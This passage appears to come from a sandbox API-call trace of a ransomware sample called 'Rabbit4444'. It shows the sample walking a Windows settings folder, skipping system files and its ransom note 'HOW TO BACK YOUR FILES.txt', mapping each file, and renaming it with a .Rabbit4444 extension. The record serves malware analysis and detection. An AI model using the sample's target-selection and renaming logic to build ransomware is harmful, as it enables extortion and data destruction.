(lpString="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms") returned 64 [0058.674] lstrlenW (lpString="Rabbit4444") returned 10 [0058.674] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.674] lstrlenW (lpString=".dll") returned 4 [0058.674] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.674] lstrlenW (lpString=".lnk") returned 4 [0058.674] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.674] lstrlenW (lpString=".ini") returned 4 [0058.674] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.674] lstrlenW (lpString=".sys") returned 4 [0058.674] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5bb16858-f647-465e-bcfd-010ee9dd41b7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.674] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.674] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14998508193) returned 1 [0058.674] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=988) returned 1 [0058.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.674] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0058.675] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.676] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.677] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14998777044) returned 1 [0058.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0058.677] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.677] CloseHandle (hObject=0x298) returned 1 [0058.677] CloseHandle (hObject=0x278) returned 1 [0058.677] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms.Rabbit4444") returned 192 [0058.677] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5bb16858-f647-465e-bcfd-010ee9dd41b7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5bb16858-f647-465e-bcfd-010ee9dd41b7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.678] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e9f0a6a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e9f0a6a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", cAlternateFileName="CLCBC2~1.SET")) returned 1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2=".") returned 1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="..") returned 1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="windows") returned -1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="boot") returned 1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.678] lstrcmpiW (lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.678] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms" | out: lpString1="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms") returned="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms" [0058.678] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.679] lstrlenW (lpString="Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms") returned 64 [0058.679] lstrlenW (lpString="Rabbit4444") returned 10 [0058.679] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.679] lstrlenW (lpString=".dll") returned 4 [0058.679] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.679] lstrlenW (lpString=".lnk") returned 4 [0058.679] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.679] lstrlenW (lpString=".ini") returned 4 [0058.679] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.679] lstrlenW (lpString=".sys") returned 4 [0058.679] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.679] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5d461b44-2753-4dd7-b2c0-bab71b1f4c1a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.679] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.679] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14999014377) returned 1 [0058.679] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=998) returned 1 [0058.679] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.680] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0058.680] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0058.681] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0058.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.682] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14999272454) returned 1 [0058.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.682] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0058.682] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.682] CloseHandle (hObject=0x298) returned 1 [0058.682] CloseHandle (hObject=0x278) returned 1 [0058.682] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms.Rabbit4444") returned 192 [0058.682] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5d461b44-2753-4dd7-b2c0-bab71b1f4c1a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D461B44-2753-4DD7-B2C0-BAB71B1F4C1A}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5d461b44-2753-4dd7-b2c0-bab71b1f4c1a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.683] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eb943d8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4eb943d8, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x41f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", cAlternateFileName="CLA931~1.SET")) returned 1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2=".") returned 1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="..") returned 1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="windows") returned -1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.687] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="boot") returned 1 [0058.688] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.688] lstrcmpiW (lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.688] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms" | out: lpString1="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms") returned="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms" [0058.688] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.688] lstrlenW (lpString="Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms") returned 64 [0058.688] lstrlenW (lpString="Rabbit4444") returned 10 [0058.688] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.688] lstrlenW (lpString=".dll") returned 4 [0058.688] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.688] lstrlenW (lpString=".lnk") returned 4 [0058.688] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.688] lstrlenW (lpString=".ini") returned 4 [0058.688] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.688] lstrlenW (lpString=".sys") returned 4 [0058.688] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5d611f64-7985-459b-bdff-aec069cb2625}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.688] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.688] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14999924541) returned 1 [0058.689] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1055) returned 1 [0058.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0058.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0058.689] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0058.690] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0058.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.691] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.691] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15000178725) returned 1 [0058.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0058.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0058.691] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.691] CloseHandle (hObject=0x298) returned 1 [0058.691] CloseHandle (hObject=0x278) returned 1 [0058.691] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms.Rabbit4444") returned 192 [0058.691] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5d611f64-7985-459b-bdff-aec069cb2625}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5D611F64-7985-459B-BDFF-AEC069CB2625}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5d611f64-7985-459b-bdff-aec069cb2625}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.692] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ecc5731, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4ecc5731, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224b3550, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x416, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", cAlternateFileName="CL44A0~1.SET")) returned 1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2=".") returned 1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="..") returned 1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="windows") returned -1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="boot") returned 1 [0058.692] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.693] lstrcmpiW (lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.693] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms" | out: lpString1="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms") returned="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms" [0058.693] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.693] lstrlenW (lpString="Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms") returned 64 [0058.693] lstrlenW (lpString="Rabbit4444") returned 10 [0058.693] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.693] lstrlenW (lpString=".dll") returned 4 [0058.693] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.693] lstrlenW (lpString=".lnk") returned 4 [0058.693] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.693] lstrlenW (lpString=".ini") returned 4 [0058.693] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.693] lstrlenW (lpString=".sys") returned 4 [0058.693] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.693] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5DD91132-02E8-43F6-88BD-E50B7BE2EF29}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5dd91132-02e8-43f6-88bd-e50b7be2ef29}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.694] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.694] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15000431839) returned 1 [0058.694] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1046) returned 1 [0058.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0058.694] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0058.697] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0058.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.698] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15000882873) returned 1 [0058.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0058.698] UnmapViewOfFile 